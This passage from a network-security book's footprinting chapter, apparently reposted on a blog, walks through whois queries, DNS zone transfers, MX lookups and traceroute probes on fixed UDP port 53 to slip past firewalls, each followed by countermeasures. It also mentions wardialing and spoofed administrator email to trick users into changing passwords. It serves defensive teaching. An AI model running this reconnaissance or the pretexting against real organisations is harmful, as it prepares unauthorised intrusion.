GTK+ GUI toolkit
Table 1-2. Whois Searching Techniques and Data Sources
Different information can be gleaned with each query. The following query types
provide the majority of information hackers use to begin their attack:
t Registrar Displays specific registrar information and associated whois servers
n Organizational Displays all information related to a particular organization
n Domain Displays all information related to a particular domain
n Network Displays all information related to a particular network or a single
IP address
s Point of contact (POC) Displays all information related to a specific person,
typically the administrative contact
Registrar Query
With the advent of the shared registry system (that is, multiple registrars), we must consult
the whois.crsnic.net server to obtain a listing of potential domains that match our
target and their associated registrar information. We need to determine the correct registrar
so that we can submit detailed queries to the correct database in subsequent steps.
For our example, we will use “Acme Networks” as our target organization and perform
our query from a UNIX (Red Hat 6.2) command shell. In the version of whois we are using,
the @ option allows you to specify an alternate database. In some BSD-derived
whois clients (for example, OpenBSD or FreeBSD), it is possible to use the –a option to
specify an alternate database. You should man whois for more information on how to submit
whois queries with your whois client.
It is advantageous to use a wildcard when performing this search because it will provide
additional search results. Using a “.” after “acme” will list all occurrences of domains that
begin with “acme” rather than domains that simply match “acme” exactly. In addition,
consult http://www.networksolutions.com/en_US/help/whoishelp.html for additional
information on submitting advanced searches. Many of the hints contained in this document
can help you dial-in your search with much more precision.
12 Hacking Exposed: Network Security Secrets and Solutions
Whois Server Addresses
European IP Address Allocations http://www.ripe.net/
Asia Pacific IP Address Allocations http://whois.apnic.net
U.S. military http://whois.nic.mil
U.S. government http://whois.nic.gov
Table 1-3. Government, Military, and International Sources of Whois Databases
[bash]$ whois "acme."@whois.crsnic.net
[whois.crsnic.net]
Whois Server Version 1.1
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
ACMETRAVEL.COM
ACMETECH.COM
ACMES.COM
ACMERACE.NET
ACMEINC.COM
ACMECOSMETICS.COM
ACME.ORG
ACME.NET
ACME.COM
ACME-INC.COM
If we are interested in obtaining more information on acme.net, we can continue to
drill down further to determine the correct registrar.
[[bash]$ whois "acme.net"@whois.crsnic.net
Whois Server Version 1.1
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: ACME.NET
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: www.networksolutions.com
Name Server: DNS1.ACME.NET
Name Server: DNS2.ACME.NET
Wecan see that Network Solutions is the registrar for this organization, which is quite
common for any organization on the Internet before adoption of the shared registry system.
For subsequent queries, we must query the respective registrar’s database because
they maintain the detailed information we want.
Organizational Query
Once we have identified a registrar, we can submit an organizational query. This type of
query will search a specific registrar for all instances of the entity name and is broader
Chapter 1: Footprinting 13
14 Hacking Exposed: Network Security Secrets and Solutions
than looking for just a domain name. We must use the keyword “name” and submit the
query to Network Solutions.
[bash]$ whois "name Acme Networks"@whois.networksolutions.com
Acme Networks (NAUTILUS-AZ-DOM) NAUTILUS-NJ.COM
Acme Networks (WINDOWS4-DOM) WINDOWS.NET
Acme Networks (BURNER-DOM) BURNER.COM
Acme Networks (ACME2-DOM) ACME.NET
Acme Networks (RIGHTBABE-DOM) RIGHTBABE.COM
Acme Networks (ARTS2-DOM) ARTS.ORG
Acme Networks (HR-DEVELOPMENT-DOM) HR-DEVELOPMENT.COM
Acme Networks (NTSOURCE-DOM) NTSOURCE.COM
Acme Networks (LOCALNUMBER-DOM) LOCALNUMBER.NET
Acme Networks (LOCALNUMBERS2-DOM) LOCALNUMBERS.NET
Acme Networks (Y2MAN-DOM) Y2MAN.COM
Acme Networks (Y2MAN2-DOM) Y2MAN.NET
Acme Networks for Christ Hospital (CHOSPITAL-DOM) CHOSPITAL.ORG
...
From this, we can see many different domains are associated with Acme Networks.
However, are they real networks associated with those domains, or have they been registered
for future use or to protect a trademark? We need to continue drilling down until
we find a live network.
When you are performing an organizational query for a large organization, there may
be hundreds or thousands of records associated with it. Before spamming became so
popular, it was possible to download the entire com domain from Network Solutions.
Knowing this, Network Solutions whois servers will truncate the results and only display
the first 50 records.
Domain Query
Based on our organizational query, the most likely candidate to start with is the Acme.net
domain since the entity is Acme Networks. (Of course, all real names and references have
been changed.)
[bash]$ whois acme.net@whois.networksolutions.com
[whois.networksolutions.com]
Registrant:
Acme Networks (ACME2-DOM)
11 Town Center Ave.
Einstein, AZ 21098
Domain Name: ACME.NET
Administrative Contact, Technical Contact, Zone Contact:
Boyd, Woody [Network Engineer] (WB9201) woody@ACME.NET
201-555-9011 (201)555-3338 (FAX) 201-555-1212
Record last updated on 13-Sep-95.
Record created on 30-May-95.
Database last updated on 14-Apr-99 13:20:47 EDT.
Domain servers in listed order:
DNS.ACME.NET 10.10.10.1
DNS2.ACME.NET 10.10.10.2
This type of query provides you with information related to the following:
t The registrant
n The domain name
n The administrative contact
n When the record was created and updated
s The primary and secondary DNS servers
At this point, you need to become a bit of a cybersleuth. Analyze the information for
clues that will provide you with more information. We commonly refer to excess information
or information leakage as “enticements.” That is, they may entice an attacker into
mounting a more focused attack. Let us review this information in detail.
By inspecting the registrant information, we can ascertain if this domain belongs to
the entity that we are trying to footprint. We know that Acme Networks is located in Arizona,
so it is safe to assume this information is relevant to our footprint analysis. Keep in
mind, the registrant’s locale doesn’t necessarily have to correlate to the physical locale of
the entity. Many entities have multiple geographic locations, each with its own Internet
connections; however, they may all be registered under one common entity. For your domain,
it would be necessary to review the location and determine if it was related to your
organization. The domain name is the same domain name that we used for our query, so
this is nothing new to us.
The administrative contact is an important piece of information because it may tell
you the name of the person responsible for the Internet connection or firewall. It also lists
voice and fax numbers. This information is an enormous help when you’re performing a
dial-in penetration review. Just fire up the wardialers in the noted range, and you’re off to
a good start in identifying potential modem numbers. In addition, an intruder will often
pose as the administrative contact, using social engineering on unsuspecting users in an
organization. An attacker will send spoofed email messages posing as the administrative
contact to a gullible user. It is amazing how many users will change their password to
whatever you like, as long as it looks like the request is being sent from a trusted technical
support person.
Chapter 1: Footprinting 15
16 Hacking Exposed: Network Security Secrets and Solutions
The record creation and modification dates indicate how accurate the information is.
If the record was created five years ago but hasn’t been updated since, it is a good bet
some of the information (for example, Administrative Contact) may be out of date.
The last piece of information provides you with the authoritative DNS servers. The
first one listed is the primary DNS server, and subsequent DNS servers will be secondary,
tertiary, and so on. We will need this information for our DNS interrogation discussed
later in this chapter. Additionally, we can try to use the network range listed as a starting
point for our network query of the ARIN database.
Using a server directive with the HST record gained from a whois query, you can discover the other
domains for which a given DNS server is authoritative. The following steps show you how.
1. Execute a domain query as detailed earlier.
2. Locate the first DNS server.
3. Execute a whois query on that DNS server:
whois "HOST 10.10.10.1"@whois.networksolutions.com
4. Locate the HST record for the DNS server.
5. Execute a whois query with the server directive using whois and
the respective HST record:
whois "SERVER NS9999-HST"@whois.networksolutions.com
Network Query
The American Registry for Internet Numbers (ARIN) is another database that we can use
to determine networks associated with our target domain. This database maintains specific
network blocks that an organization owns. It is particularly important to perform
this search to determine if a system is actually owned by the target organization or if it is
being co-located or hosted by another organization such as an ISP.
In our example, we can try to determine all the networks that “Acme Networks”
owns. Querying the ARIN database is a particularly handy query because it is not subject
to the 50-record limit implemented by Network Solutions. Note the use of the “.” wildcard.
[bash]$ whois "Acme Net."@whois.arin.net
[whois.arin.net]
Acme Networks (ASN-XXXX) XXXX 99999
Acme Networks (NETBLK) 10.10.10.0 – 10.20.129.255
Amore specific query can be submitted based upon a particular net block (10.10.10.0).
[bash]$ whois 10.10.10.0@whois.arin.net
[whois.arin.net]
Major ISP USA (NETBLK-MI-05BLK) MI-05BLK 10.10.0.0 - 10.30.255.255
ACME NETWORKS, INC. (NETBLK-MI-10-10-10) CW-10-10-10
10.10.10.0 - 10.20.129.255
ARIN provides a handy web-based query mechanism, as shown in Figure 1-4. By reviewing
the output, we can see that “Major ISP USA” is the main backbone provider and has
assigned a class A network (see TCP/IP Illustrated Volume 1 by Richard Stevens for a complete
discussion of TCP/IP) to Acme Networks. Thus, we can conclude that this is a valid
network owned by Acme Networks.
POC Query
Since the administrative contact may be the administrative contact for multiple organizations,
it is advantageous to perform a point of contact (POC) query to search by the user’s
Chapter 1: Footprinting 17
Figure 1-4. One of the easiest ways to search for ARIN information is from their web site.
database handle. The handle we are searching for is “WB9201,” derived from the preceding
domain query. You may uncover a domain that you were unaware of.
[bash]$ whois "HANDLE WB9201"@whois.networksolutions.com
Boyd, Woody [Network Engineer] (WB9201) woody@ACME.NET
BIG ENTERPRISES
11 TOWN CENTER AVE
EINSTEIN, AZ 20198
201-555-1212 (201)555-1212 (FAX) 201-555-1212
We could also search for @Acme.net to obtain a listing of all mail addresses for a given
domain. We have truncated the following results for brevity:
[bash]$ whois "@acme.net"@whois.networksolutions.net
Smith, Janet (JS9999) jsmith@ACME.NET (201)555-9211 (FAX) (201)555-3643
Benson, Bob (BB9999) bob@ACME.NET (201)555-0988
Manual, Eric(EM9999) ericm@ACME.NET (201)555-8484 (FAX) (201)555-8485
Bixon, Rob (RB9999) rbixon@ACME.NET (201)555-8072
U Countermeasure: Public Database Security
Much of the information contained in the various databases discussed thus far is geared
at public disclosure. Administrative contacts, registered net blocks, and authoritative
name server information is required when an organization registers a domain on the
Internet. However, security considerations should be employed to make the job of attackers
much more difficult.
Many times an administrative contact will leave an organization and still be able to
change the organization’s domain information. Thus, first ensure that the information listed
in the database is accurate. Update the administrative, technical, and billing contact information
as necessary. Furthermore, consider the phone numbers and addresses listed. These
can be used as a starting point for a dial-in attack or for social engineering purposes. Consider
using a toll-free number or a number that is not in your organization’s phone exchange.
In addition, we have seen several organizations list a fictitious administrative
contact, hoping to trip up a would-be social engineer. If any employee receives an email or
calls to or from the fictitious contact, it may tip off the information security department that
there is a potential problem.
Another hazard with domain registration arises from the way that some registrars allow
updates. For example, the current Network Solutions implementation allows automated
online changes to domain information. Network Solutions authenticates the domain registrant’s
identity through three different methods: the FROM field in an email, a password,
or via a Pretty Good Privacy (PGP) key. Shockingly, the default authentication method is
the FROM field via email. The security implications of this authentication mechanism are
prodigious. Essentially, anyone can trivially forge an email address and change the information
associated with your domain, better known as domain hijacking. This is exactly what
happened to AOL on October 16, 1998, as reported by the Washington Post. Someone impersonated
anAOLofficial and changed AOL’s domain information so that all traffic was
18 Hacking Exposed: Network Security Secrets and Solutions
Chapter 1: Footprinting 19
directed to autonete.net. AOL recovered quickly from this incident, but it underscores
the fragility of an organization’s presence on the Internet. It is important to choose a more
secure solution like password or PGP authentication to change domain information.
Moreover, the administrative or technical contact is required to establish the authentication
mechanism via Contact Form from Network Solutions.
Step 3. DNS Interrogation
After identifying all the associated domains, you can begin to query the DNS. DNS is a
distributed database used to map IP addresses to hostnames and vice versa. If DNS is
configured insecurely, it is possible to obtain revealing information about the organization.
MZone Transfers
Popularity: 9
Simplicity: 9
Impact: 3
Risk Rating: 7
One of the most serious misconfigurations a system administrator can make is allowing
untrusted Internet users to perform a DNS zone transfer.
A zone transfer allows a secondary master server to update its zone database from the
primary master. This provides for redundancy when running DNS, should the primary
name server become unavailable. Generally, a DNS zone transfer only needs to be performed
by secondary master DNS servers. Many DNS servers, however, are misconfigured
and provide a copy of the zone to anyone who asks. This isn’t necessarily bad if the only information
provided is related to systems that are connected to the Internet and have valid
hostnames, although it makes it that much easier for attackers to find potential targets. The
real problem occurs when an organization does not use a public/private DNS mechanism
to segregate their external DNS information (which is public) from its internal, private DNS
information. In this case, internal hostnames and IP addresses are disclosed to the attacker.
Providing internal IP address information to an untrusted user over the Internet is akin to
providing a complete blueprint, or roadmap, of an organization’s internal network.
Let’s take a look at several methods we can use to perform zone transfers and the
types of information that can be gleaned. While there are many different tools to perform
zone transfers, we are going to limit the discussion to several common types.
A simple way to perform a zone transfer is to use the nslookup client that is usually
provided with most UNIX and NT implementations. We can use nslookup in interactive
mode as follows:
[bash]$ nslookup
Default Server: dns2.acme.net
Address: 10.10.20.2
20 Hacking Exposed: Network Security Secrets and Solutions
>> server 10.10.10.2
Default Server: [10.10.10.2]
Address: 10.10.10.2
>> set type=any
>> ls -d Acme.net. >> /tmp/zone_out
We first run nslookup in interactive mode. Once started, it will tell you the default
name server that it is using, which is normally your organization’s DNS server or a DNS
server provided by your Internet service provider (ISP). However, our DNS server
(10.10.20.2) is not authoritative for our target domain, so it will not have all theDNSrecords
we are looking for. Thus, we need to manually tell nslookup which DNS server to
query. In our example, we want to use the primary DNS server for Acme Networks
(10.10.10.2). Recall that we found this information from our domain whois lookup performed
earlier.
Next we set the record type to any. This will allow you to pull any DNS records available
(man nslookup) for a complete list.
Finally, we use the ls option to list all the associated records for the domain. The –d
switch is used to list all records for the domain. We append a “.” to the end to signify the
fully qualified domain name—however, you can leave this off most times. In addition, we
redirect our output to the file /tmp/zone_out so thatwecan manipulate the output later.
After completing the zone transfer, we can view the file to see if there is any interesting
information that will allow us to target specific systems. Let’s review the output:
[bash]$ more zone_out
acct18 1D IN A 192.168.230.3
1D IN HINFO "Gateway2000" "WinWKGRPS"
1D IN MX 0 acmeadmin-smtp
1D IN RP bsmith.rci bsmith.who
1D IN TXT "Location:Telephone Room"
ce 1D IN CNAME aesop
au 1D IN A 192.168.230.4
1D IN HINFO "Aspect" "MS-DOS"
1D IN MX 0 andromeda
1D IN RP jcoy.erebus jcoy.who
1D IN TXT "Location: Library"
acct21 1D IN A 192.168.230.5
1D IN HINFO "Gateway2000" "WinWKGRPS"
1D IN MX 0 acmeadmin-smtp
1D IN RP bsmith.rci bsmith.who
1D IN TXT "Location:Accounting"
We won’t go through each record in detail, but we will point out several important
types. We see that for each entry we have an A record that denotes the IP address of the
system name located to the right. In addition, each host has an HINFO record that identifies
the platform or type of operating system running (see RFC 952). HINFO records are
Chapter 1: Footprinting 21
not needed, but provide a wealth of information to attackers. Since we saved the results of
the zone transfer to an output file, we can easily manipulate the results with UNIX programs
like grep, sed, awk, or perl.
Suppose we are experts in SunOS or Solaris. We could programmatically find out the
IP addresses that had an HINFO record associated with SPARC, Sun, or Solaris.
[bash]$ grep -i solaris zone_out |wc –l
388
Wecan see that we have 388 potential records that reference the word “Solaris.” Obviously,
we have plenty of targets.
Suppose we wanted to find test systems, which happen to be a favorite choice for attackers.
Why? Simple—they normally don’t have many security features enabled, often
have easily guessed passwords, and administrators tend not to notice or care who logs in
to them. They’re a perfect home for any interloper. Thus, we can search for test systems
as follows:
[bash]$ grep -i test /tmp/zone_out |wc –l
96
So we have approximately 96 entries in the zone file that contain the word “test.” This
should equate to a fair number of actual test systems. These are just a few simple examples.
Most intruders will slice and dice this data to zero-in on specific system types with
known vulnerabilities.
Keep a few points in mind. The aforementioned method only queries one nameserver at
a time. This means that you would have to perform the same tasks for all nameservers that
are authoritative for the target domain. In addition, we only queried the Acme.net domain.
If there were subdomains, we would have to perform the same type of query for each
subdomain (for example, greenhouse.Acme.net). Finally, you may receive a message stating
that you can’t list the domain or that the query was refused. This usually indicates that
the server has been configured to disallow zone transfers from unauthorized users. Thus,
you will not be able to perform a zone transfer from this server. However, if there are multiple
DNS servers, you may be able to find one that will allow zone transfers.
Now that we have shown you the manual method, there are plenty of tools that speed
the process, including, host, Sam Spade, axfr, and dig.
The host command comes with many flavors of UNIX. Some simple ways of using
host are as follows:
host -l Acme.net
or
host -l -v -t any Acme.net
If you need just the IP addresses to feed into a shell script, you can just cut out the IP
addresses from the host command:
host -l acme.net |cut
-f 4 -d" " >> /tmp/ip_out
Not all footprinting functions must be performed through UNIX commands. A number
of Windows products provide the same information, as shown in Figure 1-5.
Finally, you can use one of the best tools for performing zone transfers, axfr (http://
ftp.cdit.edu.cn/pub/linux/www.trinux.org/src/netmap/axfr-0.5.2.tar.gz) by Gaius. This
22 Hacking Exposed: Network Security Secrets and Solutions
Figure 1-5. If you’re Windows inclined, you could use the multifaceted Sam Spade to perform a
zone transfer as well as other footprinting tasks.
utility will recursively transfer zone information and create a compressed database of
zone and host files for each domain queried. In addition, you can even pass top-level domains
like com and edu to get all the domains associated with com and edu, respectively.
However, this is not recommended. To run axfr, you would type the following:
[bash]$ axfr Acme.net
axfr: Using default directory: /root/axfrdb
Found 2 name servers for domain 'Acme.net.':
Text deleted.
Received XXX answers (XXX records).
To query the axfr database for the information you just obtained, you would type
the following:
[bash]$ axfrcat Acme.net
Determine Mail Exchange (MX) Records
Determining where mail is handled is a great starting place to locate the target organization’s
firewall network. Often in a commercial environment, mail is handled on the same
system as the firewall, or at least on the same network. So we can use host to help harvest
even more information.
[bash]$ host Acme.net
Acme.net has address 10.10.10.1
Acme.net mail is handled (pri=20) by smtp-forward.Acme.net
Acme.net mail is handled (pri=10) by gate.Acme.net
If host is used without any parameters on just a domain name, it will try to resolve A
records first, then MX records. The preceding information appears to cross-reference
with the whois ARIN search we previously performed. Thus, we can feel comfortable
that this is a network we should be investigating.
U Countermeasure: DNS Security
DNS information provides a plethora of information to attackers, so it is important to reduce
the amount of information available to the Internet. From a host configuration perspective,
you should restrict zone transfers to only authorized servers. For modern versions of
BIND, the allow-transfer directive in the named.conf file can be used to enforce the restriction.
To restrict zone transfers in Microsoft’s DNS, you can use the Notify option. (See
http://support.microsoft.com/support/kb/articles/q193/8/37.asp for more information.)
For other nameservers, you should consult the documentation to determine what steps
are necessary to restrict or disable zone transfers.
On the network side, you could configure a firewall or packet-filtering router to deny
all unauthorized inbound connections to TCP port 53. Since name lookup requests are
UDP and zone transfer requests are TCP, this will effectively thwart a zone transfer attempt.
However, this countermeasure is a violation of the RFC, which states that DNS
Chapter 1: Footprinting 23
queries greater than 512 bytes will be sent via TCP. In most cases, DNS queries will easily
fit within 512 bytes. A better solution would be to implement cryptographic Transaction
Signatures (TSIGs) to allow only “trusted” hosts to transfer zone information. For a
step-by-step example of how to implement TSIG security, see http://romana.ucd.ie/
james/tsig.html.
Restricting zone transfers will increase the time necessary for attackers to probe for
IP addresses and hostnames. However, since name lookups are still allowed, attackers
could manually perform lookups against all IP addresses for a given net block. Therefore,
configure external name servers to provide information only about systems directly
connected to the Internet. External nameservers should never be configured to
divulge internal network information. This may seem like a trivial point, but we have
seen misconfigured nameservers that allowed us to pull back more than 16,000 internal IP
addresses and associated hostnames. Finally, we discourage the use of HINFO records.As
you will see in later chapters, you can identify the target system’s operating system with
fine precision. However, HINFO records make it that much easier to programmatically
cull potentially vulnerable systems.
Step 4. Network Reconnaissance
Now that we have identified potential networks, we can attempt to determine their network
topology as well as potential access paths into the network.
MTracerouting
Popularity: 9
Simplicity: 9
Impact: 2
Risk Rating: 7
To accomplish this task, we can use the traceroute (ftp://ftp.ee.lbl.gov/
traceroute.tar.gz) program that comes with most flavors of UNIX and is provided in Windows
NT. In Windows NT, it is spelled tracert due to the 8.3 legacy filename issues.
Traceroute is a diagnostic tool originally written by Van Jacobson that lets you
view the route that an IP packet follows from one host to the next. Traceroute uses the
time-to-live (TTL) option in the IP packet to elicit an ICMP TIME_EXCEEDED message
from each router. Each router that handles the packet is required to decrement the TTL
field. Thus, the TTL field effectively becomes a hop counter. We can use the functionality
of traceroute to determine the exact path that our packets are taking. As mentioned
previously, traceroute may allow you to discover the network topology employed by
the target network, in addition to identifying access control devices (application-based
firewall or packet-filtering routers) that may be filtering our traffic.
Let’s look at an example:
24 Hacking Exposed: Network Security Secrets and Solutions
Chapter 1: Footprinting 25
[bash]$ traceroute Acme.net
traceroute to Acme.net (10.10.10.1), 30 hops max, 40 byte packets
1 gate2 (192.168.10.1) 5.391 ms 5.107 ms 5.559 ms
2 rtr1.bigisp.net (10.10.12.13) 33.374 ms 33.443 ms 33.137 ms
3 rtr2.bigisp.net (10.10.12.14) 35.100 ms 34.427 ms 34.813 ms
4 hssitrt.bigisp.net (10.11.31.14) 43.030 ms 43.941 ms 43.244 ms
5 gate.Acme.net (10.10.10.1) 43.803 ms 44.041 ms 47.835 ms
We can see the path of the packets leaving the router (gate) and traveling three hops
(2–4) to the final destination. The packets go through the various hops without being
blocked. From our earlier work, we know that the MX record for Acme.net points to
gate.acme.net. Thus, we can assume this is a live host and that the hop before it (4) is the
border router for the organization. Hop 4 could be a dedicated application-based
firewall, or it could be a simple packet-filtering device—we are not sure yet. Generally,
once you hit a live system on a network, the system before it is a device performing routing
functions (for example, a router or a firewall).
This is a very simplistic example. But in a complex environment, there may be multiple
routing paths, that is, routing devices with multiple interfaces (for example, a Cisco 7500 series
router). Moreover, each interface may have different access control lists (ACLs) applied.
In many cases, some interfaces will pass your traceroute requests, while others will deny
it because of the ACL applied. Thus, it is important to map your entire network using
traceroute. After you traceroute to multiple systems on the network, you can begin to
create a network diagram that depicts the architecture of the Internet gateway and the location
of devices that are providing access control functionality. We refer to this as an access
path diagram.
It is important to note that most flavors of traceroute in UNIX default to sending
User Datagram Protocol (UDP) packets, with the option of using Internet Control
Messaging Protocol (ICMP) packets with the –I switch. In Windows NT, however, the
default behavior is to use ICMP echo request packets. Thus, your mileage may vary using
each tool if the site blocks UDP vs. ICMP and vice versa. Another interesting option of
traceroute includes the –g option that allows the user to specify loose source routing.
Thus, if you believe the target gateway will accept source-routed packets (which is a cardinal
sin), you might try to enable this option with the appropriate hop pointers (see man
traceroute in UNIX for more information).
There are several other switches that we need to discuss that may allow you to bypass
access control devices during our probe. The –p n option of traceroute allows you to
specify a starting UDP port number (n) that will be incremented by 1 when the probe is
launched. Thus, we will not be able to use a fixed port number without some modification to
traceroute. Luckily, Michael Schiffman has created a patch (http:// www.packetfactory
.net/Projects/firewalk/traceroute.diff) that adds the –S switch to stop port incrementation
for traceroute version 1.4a5 (ftp.cerias.purdue.edu/pub/tools/unix/netutils/traceroute/
old/). This allows you to force every packet we send to have a fixed port number, in the
hopes that the access control device will pass this traffic. A good starting port number
26 Hacking Exposed: Network Security Secrets and Solutions
would beUDPport 53 (DNS queries). Since many sites allow inboundDNS queries, there is
a high probability that the access control device will allow our probes through.
[bash]$ traceroute 10.10.10.2
traceroute to (10.10.10.2), 30 hops max, 40 byte packets
1 gate (192.168.10.1) 11.993 ms 10.217 ms 9.023 ms
2 rtr1.bigisp.net (10.10.12.13)37.442 ms 35.183 ms 38.202 ms
3 rtr2.bigisp.net (10.10.12.14) 73.945 ms 36.336 ms 40.146 ms
4 hssitrt.bigisp.net (10.11.31.14) 54.094 ms 66.162 ms 50.873 ms
5 * * *
6 * * *
We can see here that our traceroute probes, which by default send out UDP packets,
were blocked by the firewall.
Now let’s send a probe with a fixed port of UDP 53, DNS queries:
[bash]$ traceroute -S -p53 10.10.10.2
traceroute to (10.10.10.2), 30 hops max, 40 byte packets
1 gate (192.168.10.1) 10.029 ms 10.027 ms 8.494 ms
2 rtr1.bigisp.net (10.10.12.13) 36.673 ms 39.141 ms 37.872 ms
3 rtr2.bigisp.net (10.10.12.14) 36.739 ms 39.516 ms 37.226 ms
4 hssitrt.bigisp.net (10.11.31.14)47.352 ms 47.363 ms 45.914 ms
5 10.10.10.2 (10.10.10.2) 50.449 ms 56.213 ms 65.627 ms
Because our packets are now acceptable to the access control devices (hop 4), they are
happily passed. Thus, we can probe systems behind the access control device just by
sending out probes with a destination port of UDP 53. Additionally, if you send a probe
to a system that has UDP port 53 listening, you will not receive a normal ICMP unreachable
message back. Thus, you will not see a host displayed when the packet reaches its ultimate
destination.
Most of what we have done up to this point with traceroute has been command-
line oriented. For the graphically inclined, you can use VisualRoute (http://www
.visualroute.com) or NeoTrace (http://www.neotrace.com/) to perform your tracerouting.
VisualRoute provides a graphical depiction of each network hop and integrates this with
whois queries. VisualRoute, depicted in Figure 1-6, is appealing to the eye, but does not
scale well for large-scale network reconnaissance.
There are additional techniques that will allow you to determine specific ACLs that
are in place for a given access control device. Firewall protocol scanning is one such technique
and is covered in Chapter 11.
Chapter 1: Footprinting 27
U Countermeasure: Thwarting Network Reconnaissance
In this chapter, we only touched upon network reconnaissance techniques. We shall see
more intrusive techniques in the following chapters. There are, however, several countermeasures
that can be employed to thwart and identify the network reconnaissance probes
discussed thus far. Many of the commercial network intrusion detection systems (NIDSes)
will detect this type of network reconnaissance. In addition, one of the best free NIDS programs,
snort (http://www.snort.org/) by Marty Roesch, can detect this activity. If you are
interested in taking the offensive when someone traceroutes to you, Humble from Rhino9
developed a program called RotoRouter (http://packetstorm.securify.com/UNIX/loggers/
rr-1.0.tgz). This utility is used to log incoming traceroute requests and generate fake
Figure 1-6. VisualRoute, the Cadillac of traceroute tools, provides not just router hop information
but also geographic location, whois lookups, and web server banner information.
responses. Finally, depending on your site’s security paradigm, you may be able to configure
your border routers to limit ICMP and UDP traffic to specific systems, thus minimizing
your exposure.
SUMMARY
As you have seen, attackers can perform network reconnaissance or footprint your network
in many different ways. We have purposely limited our discussion to common
tools and techniques. Bear in mind, however, that new tools are released daily. Moreover,
we chose a simplistic example to illustrate the concepts of footprinting. Often you will be
faced with a daunting task of trying to identify and footprint tens or hundreds of domains.
Therefore, we prefer to automate as many tasks as possible via a combination of
shell and expect scripts or perl programs. In addition, there are many attackers well
schooled in performing network reconnaissance activities without ever being discovered,
and they are suitably equipped. Thus, it is important to remember to minimize the
amount and types of information leaked by your Internet presence and to implement vigilant
monitoring.
28 Hacking Exposed: Network Security Secrets and Solutions
Subscribe to:
Posts (Atom)